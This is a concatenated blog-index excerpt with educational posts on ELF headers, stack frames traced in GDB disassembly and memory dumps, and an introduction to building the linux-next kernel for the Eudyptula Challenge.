There are no checks in the kernel for the EI_CLASS (or I should say I could not find any; if you find one, please let me know.)\n\u0026hellip;more (DIY, kind of) There are a few more interesting things you can play around with\nEI_OSABI e_machine e_entry Conclusion ELF headers emerge as the silent orchestrators of the executable files\u0026hellip; The backstage bosses of the show. In this article, we cracked open their secrets (with not-so-real-world tricks) and dove into their nitty-gritty using hexdumps. Think of them as the cool architects of the software world, shaping how things work under the hood.\nMastering these headers is like getting a backstage pass to rock the binary world - tweaking, fixing, and making stuff dance to your tune. So next time you run an executable on *unix machines, remember, ELF headers are the groove makers behind the scenes!\nUseful links (ELF Specification 1.1) https://flint.cs.yale.edu/cs422/doc/ELF_Format.pdf ","permalink":"https://ayedaemon.github.io/post/2023/10/elf-chronicles-elf-header/","summary":"Hexdumps In the fascinating world of computers, we\u0026rsquo;re stuck conversing in binary, a rather dull language of just ones and zeros. But because we mere humans love things to be a tad more exciting and concise, we\u0026rsquo;ve come up with our own nifty number system - \u0026ldquo;hexadecimal\u0026rdquo; or \u0026ldquo;hex\u0026rdquo; for short. This system ditches the binary bore and adds a touch of flair with 16 snazzy symbols. It\u0026rsquo;s got your usual digits from 0 to 9, plus those fancy A to F letters to make data a bit more, well, hexadecimal-chic!","title":"ELF Chronicles: ELF file Header (1/?)"},{"content":"When an operating system (OS) runs a program, the program is first loaded into main memory.
Memory is used for both the program\u0026rsquo;s machine instructions and its data\u0026hellip; this includes parameters, dynamic variables, (un)initialized variables, and so on.\nMost computers today use paged memory allocation, which allows the amount of memory assigned to a program to increase or decrease as the needs of the application change. Memory is allocated to the program and reclaimed by the operating system in fixed-size chunks known as pages. When a program is loaded into a paged-memory computer, the operating system initially allocates a small number of pages to the program and then allocates additional memory as needed.\nOn a Linux machine you can check the memory layout of a running program using cat /proc/\u0026lt;proc_id\u0026gt;/maps.\n\u0026gt; cat /proc/self/maps 55f5db535000-55f5db537000 r--p 00000000 08:02 917947 /usr/bin/cat 55f5db537000-55f5db53b000 r-xp 00002000 08:02 917947 /usr/bin/cat 55f5db53b000-55f5db53d000 r--p 00006000 08:02 917947 /usr/bin/cat 55f5db53d000-55f5db53e000 r--p 00007000 08:02 917947 /usr/bin/cat 55f5db53e000-55f5db53f000 rw-p 00008000 08:02 917947 /usr/bin/cat 55f5dd440000-55f5dd461000 rw-p 00000000 00:00 0 [heap] 7f0db2800000-7f0db2aea000 r--p 00000000 08:02 929341 /usr/lib/locale/locale-archive 7f0db2ba4000-7f0db2bc9000 rw-p 00000000 00:00 0 7f0db2bc9000-7f0db2beb000 r--p 00000000 08:02 923932 /usr/lib/libc.so.6 7f0db2beb000-7f0db2d45000 r-xp 00022000 08:02 923932 /usr/lib/libc.so.6 7f0db2d45000-7f0db2d9d000 r--p 0017c000 08:02 923932 /usr/lib/libc.so.6 7f0db2d9d000-7f0db2da1000 r--p 001d4000 08:02 923932 /usr/lib/libc.so.6 7f0db2da1000-7f0db2da3000 rw-p 001d8000 08:02 923932 /usr/lib/libc.so.6 7f0db2da3000-7f0db2db2000 rw-p 00000000 00:00 0 7f0db2dd0000-7f0db2dd1000 r--p 00000000 08:02 923793 /usr/lib/ld-linux-x86-64.so.2 7f0db2dd1000-7f0db2df7000 r-xp 00001000 08:02 923793 /usr/lib/ld-linux-x86-64.so.2 7f0db2df7000-7f0db2e01000 r--p 00027000 08:02 923793 /usr/lib/ld-linux-x86-64.so.2
7f0db2e01000-7f0db2e03000 r--p 00031000 08:02 923793 /usr/lib/ld-linux-x86-64.so.2 7f0db2e03000-7f0db2e05000 rw-p 00033000 08:02 923793 /usr/lib/ld-linux-x86-64.so.2 7ffd55089000-7ffd550aa000 rw-p 00000000 00:00 0 [stack] 7ffd550f6000-7ffd550fa000 r--p 00000000 00:00 0 [vvar] 7ffd550fa000-7ffd550fc000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall] When you read the contents of /proc/self/maps, you will encounter multiple lines, with each line representing a separate memory mapping region. Each line contains six fields separated by whitespace, representing different attributes of the memory mapping:\nStart and End Addresses: The starting and ending virtual addresses of the memory mapping region. Permissions: The permissions on the mapping: read (r), write (w), execute (x), followed by whether the mapping is private (p) or shared (s). Offset: The offset into the backing file where the mapping starts, or zero if the mapping is not backed by a file. Device: The major:minor number of the device that holds the backing file. Inode: The inode number of the backing file, or 0 if the mapping is not backed by a file. Pathname: The path of the file backing the mapping, a pseudo-name such as [heap], [stack] or [vdso], or blank for an anonymous mapping. Memory layout of a process Memory space allocated to a running program/process is called process memory (AKA virtual memory). It allows multiple programs to run concurrently and provides each program with a dedicated and isolated memory space.
The purpose of process memory is to facilitate the execution of programs by providing a private address space for each process, preventing processes from interfering with one another.\nA typical memory layout consists of several segments.\nText segment (code segment) Initialized data segment (data segment) Uninitialized data segment (bss segment) Heap Stack Text segment (Code Segment) The code segment contains the executable instructions of the program. It is typically read-only and stores the program\u0026rsquo;s machine code instructions, constants, and literals.\nInitialized data segment (Data Segment) This segment contains initialized static variables, such as global variables and local static variables, which have a defined initial value and can be modified.\nUninitialized data segment (BSS Segment) This segment contains static data that has no explicit initial value. On most systems, the kernel automatically fills this segment with zeros.\nHeap This segment contains dynamically allocated memory. It is usually managed by malloc, calloc, realloc, free (and their sibling functions too). The heap segment is shared by all threads, shared libraries, and dynamically loaded modules in a process. The heap grows towards higher memory addresses.\nStack This region of memory is used for managing function calls and local variables. It is an essential part of the execution environment and plays a crucial role in program flow control.\nThe stack is typically located in the higher part of the address space and grows towards lower addresses (towards the heap). A stack pointer register keeps track of the top of the stack; it is adjusted each time a value is pushed onto or popped from the stack.\nThis is what the whole memory layout looks like altogether, but in this article we are focusing mainly on the stack segment.\nMore about stack (practical) Stack memory is organized into stack frames, each representing the activation record of a function call.
A stack frame contains information such as function parameters, local variables, return addresses, and other metadata necessary for function execution.\nLet\u0026rsquo;s start with a simple example of function calls to understand how the stack works.\n#include\u0026lt;stdio.h\u0026gt; // Prints a garbage (uninitialized) value from the stack and returns it. int func2() { int var2; printf(\u0026#34;var2 (%p) = %d\\n\u0026#34;, \u0026amp;var2, var2); return var2; } // Prints var1 value as 55 and returns it. int func1() { int var1 = 55; printf(\u0026#34;var1 (%p) = %d\\n\u0026#34;, \u0026amp;var1, var1); return var1; } // Main function int main() { // Calls both functions and stores their return values int v1 = func1(); int v2 = func2(); // Compares their return values and prints a message if(v1 == v2) printf(\u0026#34;Both values are equal\\n\u0026#34;); else printf(\u0026#34;Both values are not equal\\n\u0026#34;); return 10; } To get a better understanding of this, I\u0026rsquo;ll write down the steps this program will perform upon execution.\nCall func1(), get a return value and store that in v1 variable. Call func2(), get a return value and store that in v2 variable. Compare both values and print the appropriate message. That\u0026rsquo;s it. Quite straightforward, isn\u0026rsquo;t it? Let\u0026rsquo;s see the output of this program before jumping to conclusions.\nvar1 (0x7ffeaf266d1c) = 55 var2 (0x7ffeaf266d1c) = 55 Both values are equal Both var1 and var2 have the same value and in fact the same memory address\u0026hellip; even though they belong to different functions, each with its own stack frame and everything.\nTo understand this we\u0026rsquo;ll have to go deeper with a debugger (I\u0026rsquo;m using GDB).\n\u0026gt;\u0026gt;\u0026gt; disas main Dump of assembler code for function main: // Prologue 0x00000000000011a6 \u0026lt;+0\u0026gt;:\tpush rbp 0x00000000000011a7 \u0026lt;+1\u0026gt;:\tmov rbp,rsp // Creating space in stack for variables.
0x10 is 16 bytes (4 bytes for each int variable) // 4(v1) + 4(v2) + 8 (padding) 0x00000000000011aa \u0026lt;+4\u0026gt;:\tsub rsp,0x10 // Function call and store value in [rbp-0x4] 0x00000000000011ae \u0026lt;+8\u0026gt;:\tmov eax,0x0 0x00000000000011b3 \u0026lt;+13\u0026gt;:\tcall 0x1174 \u0026lt;func1\u0026gt; 0x00000000000011b8 \u0026lt;+18\u0026gt;:\tmov DWORD PTR [rbp-0x4],eax // Another function call and store value in [rbp-0x8] 0x00000000000011bb \u0026lt;+21\u0026gt;:\tmov eax,0x0 0x00000000000011c0 \u0026lt;+26\u0026gt;:\tcall 0x1149 \u0026lt;func2\u0026gt; 0x00000000000011c5 \u0026lt;+31\u0026gt;:\tmov DWORD PTR [rbp-0x8],eax // Compare values stored in [rbp-0x4] \u0026amp; [rbp-0x8] 0x00000000000011c8 \u0026lt;+34\u0026gt;:\tmov eax,DWORD PTR [rbp-0x4] 0x00000000000011cb \u0026lt;+37\u0026gt;:\tcmp eax,DWORD PTR [rbp-0x8] // if not equal then jump to \u0026lt;main+59\u0026gt; 0x00000000000011ce \u0026lt;+40\u0026gt;:\tjne 0x11e1 \u0026lt;main+59\u0026gt; // else print this message 0x00000000000011d0 \u0026lt;+42\u0026gt;:\tlea rax,[rip+0xe4d] # 0x2024 0x00000000000011d7 \u0026lt;+49\u0026gt;:\tmov rdi,rax 0x00000000000011da \u0026lt;+52\u0026gt;:\tcall 0x1030 \u0026lt;puts@plt\u0026gt; // And finally jump to \u0026lt;main+74\u0026gt; (epilogue) 0x00000000000011df \u0026lt;+57\u0026gt;:\tjmp 0x11f0 \u0026lt;main+74\u0026gt; // if comparision failed: land here and print this message 0x00000000000011e1 \u0026lt;+59\u0026gt;:\tlea rax,[rip+0xe52] # 0x203a 0x00000000000011e8 \u0026lt;+66\u0026gt;:\tmov rdi,rax 0x00000000000011eb \u0026lt;+69\u0026gt;:\tcall 0x1030 \u0026lt;puts@plt\u0026gt; // Finally epilogue - set return value and leave 0x00000000000011f0 \u0026lt;+74\u0026gt;:\tmov eax,0xa 0x00000000000011f5 \u0026lt;+79\u0026gt;:\tleave 0x00000000000011f6 \u0026lt;+80\u0026gt;:\tret End of assembler dump. 
In the disassembly code, the main function calls both functions and stores their respective return values in the [rbp-0x4] and [rbp-0x8] memory locations. Since these variables are local to the main function, they are created in stack memory (inside the stack frame for the main function).\n\u0026gt;\u0026gt;\u0026gt; disas func1 Dump of assembler code for function func1: // Prologue 0x0000000000001174 \u0026lt;+0\u0026gt;:\tpush rbp 0x0000000000001175 \u0026lt;+1\u0026gt;:\tmov rbp,rsp // Create memory for the variable -- 4(var1) + 12(padding) = 16 (0x10) 0x0000000000001178 \u0026lt;+4\u0026gt;:\tsub rsp,0x10 // Store 0x37(55) in [rbp-0x4] 0x000000000000117c \u0026lt;+8\u0026gt;:\tmov DWORD PTR [rbp-0x4],0x37 // Print this value with a specific message 0x0000000000001183 \u0026lt;+15\u0026gt;:\tmov edx,DWORD PTR [rbp-0x4] 0x0000000000001186 \u0026lt;+18\u0026gt;:\tlea rax,[rbp-0x4] 0x000000000000118a \u0026lt;+22\u0026gt;:\tmov rsi,rax 0x000000000000118d \u0026lt;+25\u0026gt;:\tlea rax,[rip+0xe80] # 0x2014 0x0000000000001194 \u0026lt;+32\u0026gt;:\tmov rdi,rax 0x0000000000001197 \u0026lt;+35\u0026gt;:\tmov eax,0x0 0x000000000000119c \u0026lt;+40\u0026gt;:\tcall 0x1040 \u0026lt;printf@plt\u0026gt; // Epilogue: set this value as return value and leave 0x00000000000011a1 \u0026lt;+45\u0026gt;:\tmov eax,DWORD PTR [rbp-0x4] 0x00000000000011a4 \u0026lt;+48\u0026gt;:\tleave 0x00000000000011a5 \u0026lt;+49\u0026gt;:\tret End of assembler dump. The above function, when called, will create another stack frame just below the main function\u0026rsquo;s stack frame\u0026hellip; and will create its local variables in that region.\nThis function will print the value of the local variable and then return to the main function. Returning removes the stack frame by resetting the stack pointer and base pointer register values\u0026hellip; BUT the actual values stored at those memory locations are not overwritten by anything.
So technically, the values are still present there and can be accessed by anything that points to that memory location.\n\u0026gt;\u0026gt;\u0026gt; disas func2 Dump of assembler code for function func2: // Prologue 0x0000000000001149 \u0026lt;+0\u0026gt;:\tpush rbp 0x000000000000114a \u0026lt;+1\u0026gt;:\tmov rbp,rsp // Create memory for the variable -- 4(var2) + 12(padding) = 16 (0x10) 0x000000000000114d \u0026lt;+4\u0026gt;:\tsub rsp,0x10 // Print the value with a specific message 0x0000000000001151 \u0026lt;+8\u0026gt;:\tmov edx,DWORD PTR [rbp-0x4] 0x0000000000001154 \u0026lt;+11\u0026gt;:\tlea rax,[rbp-0x4] 0x0000000000001158 \u0026lt;+15\u0026gt;:\tmov rsi,rax 0x000000000000115b \u0026lt;+18\u0026gt;:\tlea rax,[rip+0xea2] # 0x2004 0x0000000000001162 \u0026lt;+25\u0026gt;:\tmov rdi,rax 0x0000000000001165 \u0026lt;+28\u0026gt;:\tmov eax,0x0 0x000000000000116a \u0026lt;+33\u0026gt;:\tcall 0x1040 \u0026lt;printf@plt\u0026gt; // Epilogue: set this value as return value and leave 0x000000000000116f \u0026lt;+38\u0026gt;:\tmov eax,DWORD PTR [rbp-0x4] 0x0000000000001172 \u0026lt;+41\u0026gt;:\tleave 0x0000000000001173 \u0026lt;+42\u0026gt;:\tret End of assembler dump. After func1 has returned, it\u0026rsquo;s time for func2 to create its own stack frame and its own local variables.\nBecause both functions are called from main at the same stack depth and set up identical frames, the memory location used by func2 is exactly the same location that was used by func1 earlier. And on top of that, both functions have int type variables at [rbp-0x4], which means that the memory location used by var1 in func1 will be used by var2 in func2.\nThe stack frames of both functions effectively overlap each other. That should explain why we were getting the same results and same memory locations in the program output earlier.\nThis theory should be enough to understand what\u0026rsquo;s going on\u0026hellip; But the practical part is more fun.
Accept it!!\nI\u0026rsquo;m going to place some breakpoints in the code and check the status of the stack on each hit. For me, such interesting points are where new variables or function\u0026rsquo;s stack frame will be created. This will help me to analyze the change in stack as we go forward.\n(NOTE: Sometimes I over-use breakpoints. Don\u0026rsquo;t judge me :| )\n\u0026gt;\u0026gt;\u0026gt; info break Num Type Disp Enb Address What // 0x5555555551a6 \u0026lt;main+0\u0026gt;:\tpush rbp 1 breakpoint keep y 0x00005555555551a6 in main at func_calls.c:16 // 0x5555555551aa \u0026lt;main+4\u0026gt;:\tsub rsp,0x10 2 breakpoint keep y 0x00005555555551aa in main at func_calls.c:16 // 0x5555555551b3 \u0026lt;main+13\u0026gt;:\tcall 0x555555555174 \u0026lt;func1\u0026gt; 3 breakpoint keep y 0x00005555555551b3 in main at func_calls.c:17 // 0x5555555551c0 \u0026lt;main+26\u0026gt;:\tcall 0x555555555149 \u0026lt;func2\u0026gt; 4 breakpoint keep y 0x00005555555551c0 in main at func_calls.c:18 // 0x5555555551f5 \u0026lt;main+79\u0026gt;:\tleave 5 breakpoint keep y 0x00005555555551f5 in main at func_calls.c:26 // 0x555555555174 \u0026lt;func1\u0026gt;:\tpush rbp 6 breakpoint keep y 0x0000555555555174 in func1 at func_calls.c:9 // 0x555555555178 \u0026lt;func1+4\u0026gt;:\tsub rsp,0x10 7 breakpoint keep y 0x0000555555555178 in func1 at func_calls.c:9 // 0x5555555551a5 \u0026lt;func1+49\u0026gt;:\tret 8 breakpoint keep y 0x00005555555551a5 in func1 at func_calls.c:13 // 0x555555555149 \u0026lt;func2\u0026gt;:\tpush rbp 9 breakpoint keep y 0x0000555555555149 in func2 at func_calls.c:3 // 0x55555555514d \u0026lt;func2+4\u0026gt;:\tsub rsp,0x10 10 breakpoint keep y 0x000055555555514d in func2 at func_calls.c:3 // 0x555555555173 \u0026lt;func2+42\u0026gt;:\tret 11 breakpoint keep y 0x0000555555555173 in func2 at func_calls.c:7 I\u0026rsquo;ve set up 11 break points here which will help me check the change in stack during the execution of the program.\nAfter running the program in 
debugger, it\u0026rsquo;ll stop at the first break point which is just before the point where main function\u0026rsquo;s stack frame will begin.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe218:\t0x00007ffff7de0790\t0x00007fffffffe310 0x7fffffffe228:\t0x00005555555551a6\t0x0000000155554040 0x7fffffffe238:\t0x00007fffffffe328\t0x00007fffffffe328 0x7fffffffe248:\t0x86b5da47f7ba01f3\t0x0000000000000000 0x7fffffffe258:\t0x00007fffffffe338\t0x0000555555557dd8 Theoretically, we know if we step over another instruction, value from rbp will be stored in the stack. So let\u0026rsquo;s check the value of rbp right now and then monitor the stack (after stepping over) to see if it is the same value we are expecting it to be.\n// Check the base pointer before stepping over instruction \u0026gt;\u0026gt;\u0026gt; p $rbp $1 = (void *) 0x1 // Check the next instruction to be executed \u0026gt;\u0026gt;\u0026gt; x $rip =\u0026gt; 0x5555555551a6 \u0026lt;main\u0026gt;:\tpush rbp // Step over an instruction \u0026gt;\u0026gt;\u0026gt; ni // Monitor stack \u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 0x7fffffffe240:\t0x00007fffffffe328\t0x8f2aa2d53bd1951c 0x7fffffffe250:\t0x0000000000000000\t0x00007fffffffe338 Now our stack has a new item in it, that is rbp value. If you notice, previously the top of the stack was at 0x7fffffffe218, but after adding one item the top of stack is 0x7fffffffe210. 
It decreased, which indicates that stack grows downwards; towards lower memory addresses.\nThe stack does not change up until the breakpoint 2 on 0x5555555551aa \u0026lt;main+4\u0026gt;:\tsub rsp,0x10\u0026hellip; But on stepping another instruction, we can see a new space of 16 bytes in the stack.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe200:\t0x0000000000000000\t0x00007ffff7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 0x7fffffffe240:\t0x00007fffffffe328\t0x8f2aa2d53bd1951c Before this, the stack pointer was on 0x7fffffffe210, now the stack pointer is on 0x7fffffffe200\u0026hellip; so 0x7fffffffe210 - 0x7fffffffe200 = 0x10 (16). Simple maths!!\nWe just moved the stack pointer down to create space required, no cleaning was done\u0026hellip; hence the stack is already filled with some garbage value that resided in the memory long before the stack occupied this new memory region.\nNow let\u0026rsquo;s call the function func1 and see what that function call will add to the stack.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1f8:\t0x00005555555551b8\t0x0000000000000000 0x7fffffffe208:\t0x00007ffff7ffdab0\t0x0000000000000001 0x7fffffffe218:\t0x00007ffff7de0790\t0x00007fffffffe310 0x7fffffffe228:\t0x00005555555551a6\t0x0000000155554040 0x7fffffffe238:\t0x00007fffffffe328\t0x00007fffffffe328 Just after making the function call and before executing the first instruction of the func1, we have a new value in the stack. This new value is the return address for the main function, which will be used to continue execution after the func1 call is finished.\n\u0026gt;\u0026gt;\u0026gt; x/i 0x00005555555551b8 0x5555555551b8 \u0026lt;main+18\u0026gt;:\tmov DWORD PTR [rbp-0x4],eax (Note: if this value is somehow overwritten, we can make our function to return to another function or instruction. 
This is something which comes under a technique called Return Oriented Programming aka ROP.)\nAfter the first instruction of the func1 function, that is pushing the rbp on the stack, we can see an updated stack.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1f0:\t0x00007fffffffe210\t0x00005555555551b8 0x7fffffffe200:\t0x0000000000000000\t0x00007ffff7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 This points to the place where the main function\u0026rsquo;s base pointer is. Think this as a chain like connection which links to the next stop.\nNow after creating some space in this new stack frame for var1\u0026hellip;. Stack looks like this. (Notice that the stack keeps on growing down, towards low memory regions.)\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1e0:\t0x0000000000000000\t0x0000000000000000 0x7fffffffe1f0:\t0x00007fffffffe210\t0x00005555555551b8 0x7fffffffe200:\t0x0000000000000000\t0x00007ffff7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 The leave instruction does a lot of the work. It copies the rbp to rsp and then restores the old rbp from the stack again.\nThis will move the base pointer back to 0x00007fffffffe210 and the stack pointer to 0x00007fffffffe1f8.\nThis instruction basically releases a stack frame set up by a function. 
That means now our new stack will look something like this.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1f8:\t0x00005555555551b8\t0x0000000000000000 0x7fffffffe208:\t0x00007ffff7ffdab0\t0x0000000000000001 0x7fffffffe218:\t0x00007ffff7de0790\t0x00007fffffffe310 0x7fffffffe228:\t0x00005555555551a6\t0x0000000155554040 0x7fffffffe238:\t0x00007fffffffe328\t0x00007fffffffe328 The next ret statement will take off the top of the value from stack and move the instruction control to that memory location\u0026hellip; that is, set the rip value to that memory location. This means that the next instruction to be executed will be \u0026lt;main+18\u0026gt; which stores the eax (return value from the previous function call) into [rbp-0x4] location on stack.\n\u0026gt;\u0026gt;\u0026gt; x/i 0x00005555555551b8 =\u0026gt; 0x5555555551b8 \u0026lt;main+18\u0026gt;:\tmov DWORD PTR [rbp-0x4],eax So when func1 returns back, our stack looks something like this.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe200:\t0x0000000000000000\t0x00007ffff7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 0x7fffffffe240:\t0x00007fffffffe328\t0x42033bae0bc1441d Now for the next function func2, our stack is like this, just before the sub rsp,0x10 instruction. 
This instruction will create enough memory for the variables to be.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1f0:\t0x00007fffffffe210\t0x00005555555551c5 0x7fffffffe200:\t0x0000000000000000\t0x00000037f7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 Once the space in stack memory is created, the stack looks like this\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1e0:\t0x0000000000000000\t0x0000003700000000 0x7fffffffe1f0:\t0x00007fffffffe210\t0x00005555555551c5 0x7fffffffe200:\t0x0000000000000000\t0x00000037f7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 If you notice, these are the same memory locations which were used by func1 to store 0x37 (mov DWORD PTR [rbp-0x4],0x37)\u0026hellip;. and since the stack is not cleaned properly, the value from that function is still in the place it was left to be picked by our variable var2.\nThis can be checked with x/w ($rbp-0x4)\n\u0026gt;\u0026gt;\u0026gt; x/w ($rbp-0x4) 0x7fffffffe1ec:\t0x00000037 So the value is just as it was left by func1\u0026hellip; :|\nNow after returning back to main function, the stack looks like this.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe200:\t0x0000000000000000\t0x0000003700000037 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 0x7fffffffe240:\t0x00007fffffffe328\t0x42033bae0bc1441d And both v1 and v2, are same values and were picked from the same memory locations when in their respective function frames.\n\u0026gt;\u0026gt;\u0026gt; x/w $rbp-0x4 0x7fffffffe20c:\t0x00000037 \u0026gt;\u0026gt;\u0026gt; x/w $rbp-0x8 0x7fffffffe208:\t0x00000037 This explains the somewhat unusual behaviour of the program. 
There is nothing special about this, its just the way the stack memory works and a well crafted example presented to you.\nIn next article, I\u0026rsquo;ll try to cover stack overflows\u0026hellip; which is a cool technique to insert the data in a variable which will overflow and overwrite the data for another variable. Try to think around this, if you may.\n","permalink":"https://ayedaemon.github.io/post/2023/05/intro-to-re-part-4/","summary":"When an operating system (OS) runs a program, the program is first loaded into main memory. Memory is utilized for both program\u0026rsquo;s machine instructions and program\u0026rsquo;s data\u0026hellip;this includes parameters, dynamic variables, (un)initialized variables, and so on.\nMost computers today use paged memory allocations, which allow the amount of memory assigned to a program to increase/decrease as the needs of the application change. Memory is allocated to the program and reclaimed by the operating system in fixed-size chunks known as pages.","title":"Intro to RE: C : part-4"},{"content":"This is Task 07 of the Eudyptula Challenge ------------------------------------------ Great work with that misc device driver. Isn\u0026#39;t that a nice and simple way to write a character driver? Just when you think this challenge is all about writing kernel code, this task is a throwback to your second one. Yes, that\u0026#39;s right, building kernels. Turns out that\u0026#39;s what most developers end up doing, tons and tons of rebuilds, not writing new code. Sad, but it is a good skill to know. The tasks this round are: - Download the linux-next kernel for today. Or tomorrow, just use the latest one. It changes every day so there is no specific one you need to pick. Build it. Boot it. Provide proof that you built and booted it. What is the linux-next kernel? Ah, that\u0026#39;s part of the challenge. 
For a hint, you should read the excellent documentation about how the Linux kernel is developed in Documentation/development-process/ in the kernel source itself. It\u0026#39;s a great read, and should tell you all you never wanted to know about what Linux kernel developers do and how they do it. What is Linux?? Before jumping on Linux-next\u0026hellip;let\u0026rsquo;s start with an overview of the Linux kernel and its significance within the Linux operating system.\nLinux is an open-source operating system kernel that was initially developed by Linus Torvalds in 1991. The kernel serves as the core component of the Linux operating system, providing essential functionalities and acting as an intermediary between the hardware and the software layers.\nThe Linux kernel plays a crucial role in managing system resources, handling hardware devices, and providing a foundation for software applications to run efficiently. Some of its key responsibilities include process management, memory management, device driver handling, file system management, and networking.\nOne of the defining characteristics of Linux is its open-source nature. This means that the source code of the kernel is freely available to the public, allowing individuals and communities to examine, modify, and distribute it according to their needs. This openness has fostered a vibrant ecosystem of developers who collaborate to improve and enhance the kernel\u0026rsquo;s capabilities.\nLinux is renowned for its stability, security, and scalability. Its robust design and efficient resource management make it suitable for a wide range of computing devices, from small embedded systems and smartphones to large-scale servers and supercomputers. 
Moreover, Linux serves as the foundation for numerous Linux distributions, which are complete operating systems that package the Linux kernel with additional software and user-friendly interfaces.\nBy harnessing the power of open-source collaboration, Linux has grown into a highly versatile and widely adopted operating system, powering various domains such as enterprise computing, cloud infrastructure, scientific research, mobile devices, and more. Its flexibility, reliability, and vast community support make it an attractive choice for individuals, businesses, and organizations seeking a powerful and customizable operating system.\nNow that we have a basic understanding of Linux and its kernel, we can delve into the concept of Linux-next and its significance within the development process.\nBig picture of linux development The development of the Linux kernel in the open-source world is a remarkable (somewhat scary for me) and dynamic process that involves collaboration among thousands of developers worldwide. Here\u0026rsquo;s a big picture overview of the Linux kernel development process:\nCollaboration and Community: The Linux kernel development thrives on collaboration and community engagement. It is led by Linus Torvalds, the original creator of Linux, along with a core group of maintainers who oversee different subsystems of the kernel. The development process follows a meritocratic model where contributions are reviewed and integrated based on their technical merits.\nPatch Submission: Developers from diverse backgrounds and organizations contribute to the Linux kernel. They propose changes, enhancements, bug fixes, and new features in the form of patches. These patches are submitted to the relevant subsystem maintainers or mailing lists for review.\nReview and Feedback: The submitted patches undergo a thorough review process, where experienced developers provide feedback, suggestions, and technical guidance. 
The review process ensures that the proposed changes align with the kernel\u0026rsquo;s standards, maintain compatibility, and adhere to best practices.\nIterative Development: Developers iterate on their patches based on the feedback received during the review process. They make necessary modifications, address concerns, and refine their code to meet the kernel\u0026rsquo;s quality standards.\nTesting and Integration: Once the patches are considered ready, they are tested extensively. Various testing frameworks, such as the Linux Test Project (LTP) and KernelCI, are used to ensure that the changes do not introduce regressions and maintain stability. The patches are then integrated into the \u0026ldquo;mainline\u0026rdquo; development branch.\nMainline Integration: The mainline development branch is where the accepted patches are merged into the official Linux kernel source code. Linus Torvalds oversees this process and has the final authority to accept or reject patches based on technical considerations. The mainline branch represents the most up-to-date version of the Linux kernel and serves as the basis for future releases.\nStable Releases and Long-Term Support: The Linux kernel follows a time-based release model, with new stable versions being released approximately every two to three months. These releases incorporate the accumulated changes from the mainline branch, undergo further testing, and receive bug fixes. Additionally, long-term support (LTS) versions are maintained for an extended period to ensure stability and compatibility for enterprise and embedded systems.\nEcosystem and Distribution: The Linux kernel forms the foundation for numerous Linux distributions. These distributions package the kernel with additional software, libraries, and user interfaces to create complete operating systems suitable for various use cases. 
The distributions play a crucial role in making Linux accessible to a wide range of users, providing installation, customization, and support options.\nThe Linux kernel development follows a patch cycle that involves several release candidate (RC) versions before a stable release is made. Here\u0026rsquo;s an overview of the Linux patch cycle and RC versions:\nDevelopment Cycle: The development cycle begins after a stable release is made. During this cycle, new features, enhancements, bug fixes, and improvements are introduced into the Linux kernel.\nPatch Submission: Developers submit patches for review and inclusion in the next kernel release. These patches can come from individual contributors, companies, or organizations.\nMainline Integration: The submitted patches go through a review process, where they are examined for technical correctness, adherence to coding standards, and compatibility with existing code. Accepted patches are integrated into the mainline development branch of the Linux kernel.\nMerge Window: The merge window is a specific period at the beginning of the development cycle when major changes and new features are merged into the mainline development branch. During this time, the Linux kernel developers are more open to accepting substantial modifications.\nRelease Candidates (RC): After the merge window closes, the Linux kernel development enters the release candidate phase. Release candidates are pre-release versions of the kernel that undergo testing and further refinement before the final stable release. Each release candidate is identified by the tag -rc\u0026lt;number\u0026gt;.\nRC1: The first release candidate marks the beginning of the testing phase for the upcoming release. It includes the merged changes from the merge window. RC2, RC3, and so on: Successive release candidates incorporate additional bug fixes, improvements, and patches that are considered stable enough to be tested. 
